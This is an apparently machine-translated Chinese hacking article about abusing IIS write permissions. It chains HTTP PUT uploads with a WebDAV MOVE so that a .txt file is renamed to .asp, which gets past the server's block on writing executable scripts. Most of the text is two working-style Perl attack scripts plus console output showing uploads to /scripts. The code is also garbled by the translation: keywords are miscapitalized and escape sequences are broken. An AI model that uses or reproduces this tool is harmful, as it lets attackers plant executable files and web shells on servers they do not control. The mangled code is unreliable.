Utilization of IIS write access

zhaozj2021-02-16  75

Everyone may have seen the "Remote Analysis IIS Settings", which analyzes the various settings of IIS. I will analyze the write permission of IIS. The following references "Remote Analysis IIS Settings" article pairs IIS write permission analysis content:

Write permission

Test a directory for WEB users have write permissions, use the following method: Telnet to the server's web port (80) and send a request:

Put /DIR/MY_FILE.TXT HTTP / 1.1

Host: IIS-Server

Content-Length: 10

At this time, the server returns a 100 (continued) information:

HTTP / 1.1 100 Continue

Server: Microsoft-IIS / 5.0

Date: Thu, 28 Feb 2002 15:56:00 GMT

Then we enter 10 letters:

Aaaaaaaaaaaaa

After sending this request, see the return information of the server if it is a 201 CREATED response:

HTTP / 1.1 201 CREATED

Server: Microsoft-IIS / 5.0

Date: Thu, 28 Feb 2002 15:56:08 GMT

Location: http://iis-server/dir/my_file.txt

Content-Length: 0

Allow: Options, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,

Proppatch, Search, Lock, Unlock

Then explain the write authority of this directory is open. Opened writes, but anonymous users are not allowed. If a directory has also opened "Write" and "Script and Executable Programs", then web users can upload a program and perform it, horror oh% ^ # $! ~

Here is a brief explanation:

Put /DIR/MY_FILE.TXT HTTP / 1.1

Host: IIS-Server

Content-Length: 10

PUT: Request the server to store the entity of the attachment in the provided request URL, if the request URL points to the resource already exists, the attachment entity should be seen as a modified version of the resource on the current original server. If the request URL does not point to the existing resource, the URL will be defined by the requested user agent into a new resource, and the original server will use this URL to generate this resource.

Host: is the send address of HTTP request

Content-length: is the length of the content, that is, the length of the solid, the length value, and the uploaded file size

Submit Using NC (Telnet), we write a simple Perl program here to complete this complex submission process. When we write code, we open the file with binmode (), the code is as follows:

#! / usr / bin / perl

Use IO :: Socket;

$ Argc = @argv;

IF ($ argc! = 4)

{

Print "USAGE: $ 0 127.0.0.1 80 kaka.exe /scripts/file.exe/n";

EXIT;

}

$ Host = @argv [0];

$ port = @argv [1];

$ file = @argv [2];

$ PATH = @argv [3];

@ s = stat ("$ file");

$ SIZE = $ s [7]; # get file size Print "$ file size is $ size bytes / n";

MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp",

Peeraddr => $ Host,

Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";

Print $ SOCK "PUT $ PATH HTTP / 1.1 / N";

Print $ SOCK "Host: $ Host / N";

Print $ SOCK "Content-Length: $ SIZE / N / N"; #SOCK connection

Open (File, "$ file");

BINMODE (file); # with 2-way open file

WHILE (READ (File, $ Char, 1024)) {# read file data upload

Print $ SOCK "$ char";

}

Print $ SOCK "/ N / N";

@REQ = <$ sock>;

Print "please wait ... / n";

Sleep (2);

IF ($ REQ [4] = ~ / 200 | 201 /) {

Print "Upfile succeed !!!"; # successfully displayed

}

Else {

Print "Upfile Faile !!! / N / N";

Print @Req; # If the failed display returns an error

}

CLOSE $ SOCK;

Close file;

Let's test below:

C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt

Kaka.txt size is 14 bytes

Please wait ...

Upfile succeed !!!

C: / inetpub / scripts> dir kaka.txt

The volume in the drive C does not have a label.

The serial number of the volume is 3CD1-479E

C: / INETPUB / SCRIPTS directory

2004-05-05 00:37 14 kaka.txt

1 file 14 bytes

0 catalog 3,871,080,448 available bytes

Here we successfully upload Kaka.txt to the web directory scripts, in which the binmode () mode (2) opened files in the program, you should be able to upload other files, let us test the exe file:

C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exe

Perl.exe size is 20535 bytes

Please wait ...

Upfile succeed !!!

C: / inetpub / scripts> Dir perl.exe

The volume in the drive C does not have a label.

The serial number of the volume is 3CD1-479E

C: / INETPUB / SCRIPTS directory

2004-05-05 00:42 20,535 Perl.exe

1 file 20,535 bytes

0 catalog 3,871,031,296 available bytes

Success, you can upload EXE, is it possible to go upload any file? Then test the ASP file:

C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp

Kaka.asp size is 4 bytes

Please wait ...

Upfile faile !!! HTTP / 1.1 100 Continue

Server: Microsoft-IIS / 5.0

Date: Tue, 04 May 2004 16:45:51 GMT

HTTP / 1.1 403 Forbidden

Server: Microsoft-IIS / 5.0

Date: Tue, 04 May 2004 16:45:51 GMT

Connection: Close

Content-Type: Text / HTML

Content-Length: 44

http / 1.1 403 forbidden

failure! ! Tip http / 1.1 403 Forbidden error, it seems that it is not possible to write ASP directly in Post mode. If it is tested, it will generate an HTTP / 1.1 403 forbidden error.

Then how can we upload the file type file supported by IIS? In addition to the action of PUT, POST, GET, IIS can execute commands, huh! We can first upload local ASP to other files such as TXT below the remote host web directory, and will be changed to the ASP.

We still use NC to submit tests:

D: /> NC 127.0.0.1 80

Move /scripts/kaka.txt http / 1.1

Host: 127.0.0.1

Destination: http://127.0.0.1/scripts/kaka.asp

HTTP / 1.1 201 CREATED

Server: Microsoft-IIS / 5.0

Date: Sun, 05 Oct 2003 09:30:59 GMT

Location: http://127.0.0.1/scripts/x.asp

Content-Type: Text / XML

Content-Length: 0

Successfully uses Move /scripts/kaka.txt to change the name /scripts/kaka.asp. This way we can combine PUT and MOVE to complete the IIS write easy file :). We still use Perl to do.

Test written ASP success:

C: / usr / bin> Perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp

*********************************************************** **********

Codz by ≯superhei && LANKER

*********************************************************** **********

Kaka.asp size is 4 bytes

Please wait ...

Upfile succeed !!!

Modifyfile succeed !!!

The final IiSWRITE.PL code is as follows (when writing this article, the code in the Internet cafes is first "draft", and the LANKER test and finally completed, THX lanker.):

#! / usr / bin / perl

#The Iiswrite Script

Use IO :: Socket;

$ Argc = @argv;

PRINT "*" x 60;

Print "/ ncodz by ≯superhei && LANKER / N";

Print "*" x 60, "/ n"; if ($ argc! = 4)

{

Print "USAGE: $ 0 127.0.0.1 80 kaka.txt /scripts/my_file.txt/n";

EXIT;

}

$ Host = @argv [0];

$ port = @argv [1];

$ PATH = @argv [3];

$ file = @argv [2];

@ Path = Split ("/", $ PATH);

$ any = POP (@Path);

$ PATH1 = JOIN ("/", @ PATH);

@ s = stat ("$ file");

$ SIZE = $ S [7];

Print "$ FILE SIZE IS $ SIZE BYTES / N";

MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp",

Peeraddr => $ Host,

Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";

Print $ SOCK "PUT $ Path1 / Lanker.txt HTTP / 1.1 / N";

Print $ SOCK "Host: $ Host / N";

Print $ SOCK "Content-Length: $ SIZE / N / N";

Open (File, "$ file") || DIE "can't open $ file";

Binmode (file);

While (READ (File, $ Char, 1024)) {

Print $ SOCK "$ char";

}

Print $ SOCK "/ N / N";

@REQ = <$ sock>;

Print "please wait ... / n";

Sleep (2);

IF ($ REQ [4] = ~ / 200 | 201 /) {

Print "Upfile succeed !!! / n";

}

Else {

Print "Upfile Faile !!! / N";

}

CLOSE $ SOCK;

Close file;

MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp",

Peeraddr => $ Host,

Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";

Print $ SOCK "Move $ Path1 / LANKER.TXT HTTP / 1.1 / N";

Print $ SOCK "Host: $ Host / N";

Print $ SOCK "DESTINATION: http: // $ host: $ port $ path / n / n / n / n";

@REQ = <$ sock>;

IF ($ REQ [0] = ~ / 20 / d | /) {

Print "ModifyFile success !!!";

}

Else {

Print "Upfile faile !!!";

}

CLOSE $ SOCK;

转载请注明原文地址:https://www.9cbs.com/read-12371.html

New Post(0)